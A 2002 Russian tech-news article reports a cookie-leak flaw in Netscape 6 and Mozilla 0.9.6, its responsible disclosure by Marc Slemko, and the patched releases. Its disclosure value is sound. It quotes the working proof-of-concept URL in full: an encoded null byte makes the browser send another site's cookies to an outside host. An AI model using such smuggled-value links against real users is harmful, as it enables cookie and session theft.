http://www.netoscope.ru/news/2002/01/30/4669.html
Netscape и Mozilla отдают cookies на сторону
Алексей Рерих
30.01.2002 13:46
|
Нетоскоп/Новости/30.01.2002 http://www.netoscope.ru/news/2002/01/30/4669.html Netscape и Mozilla отдают cookies на сторону Алексей Рерих 30.01.2002 13:46 |
|
В браузере Netscape Communicator обнаружена дыра, позволяющая злоумышленнику получить доступ к пользовательским cookies.
Уязвимое место, обнаруженное в Netscape, начиная с версии 6.0 и выше, аналогично дыре в браузере Mozilla версии 0.9.6 и более ранних, на движке которого создан последний Netscape.
И Netscape и Mozilla уже выпустили обновленные версии браузеров (Netscape 6.2.1 и Mozilla 0.9.7), в которых уязвимость устранена.
Сообщение об обнаружении уязвимого места помещено на сайте . Марк Слемко пишет в своем отчете, что для получения доступа к чужим cookies достаточно разместить на веб-странице или в электронном html-сообщении гиперссылку определенного вида. В результате оба браузера отсылают по указанному адресу cookies, предназначенные для совсем другого (любого другого) сайта.
В нормальной ситуации информация, сохраняемая в cookies, может быть прочитана только тем сервером, который ее записывал (или теми, в которых сервер кооперирован, то есть, находится в одном домене). Параметры браузера можно выставить таким образом, что cookies будет "отдаваться" только через безопасное SSL-соединение.
Однако обнаруженный Марком Слемко баг позволяет любому получать чужие cookies в обход всех этих защитный механизмов.
Баг был онаружен еще 15 ноября прошлого года. Тогда же Слемко отослал сообщение об обнаруженной дыре в Netscape и, после долгих поисков почтового адреса, разработчикам браузера Mozilla.
И только после того, как необходимые патчи и апгрейды были разработаны, Марк Слемко опубликовал информацию о дыре.
Собственно, сама дыра, по выражению самого Слемко, тривиальна: достаточно разместить на странице или в e-mail ссылку вида: http://alive.znep.com%00www.passport.com/cgi-bin/cookies. В результате клика по ссылке дырявые браузеры отошлют на сервер, адрес которого указан до %00, cookies предназначенные для сервера, адрес которого расположен после %00.
Несмотря на тривиальность исполнения, это нарушение безопасного соединения может привести к самым различным последствиям. Все зависит от того, какая информация о пользователе хранится на севере, доступ к cookies которого получен злоумышленником.
Аналогичные баги были не так давно обнаружены и в Microsoft Internet Explorer.
Скачать обновленную, залатанную версию барузеров можно на сайтах Netscape.com () и .
 |
Copyright © 2000-2002 Нетоскоп www.netoscope.ru |
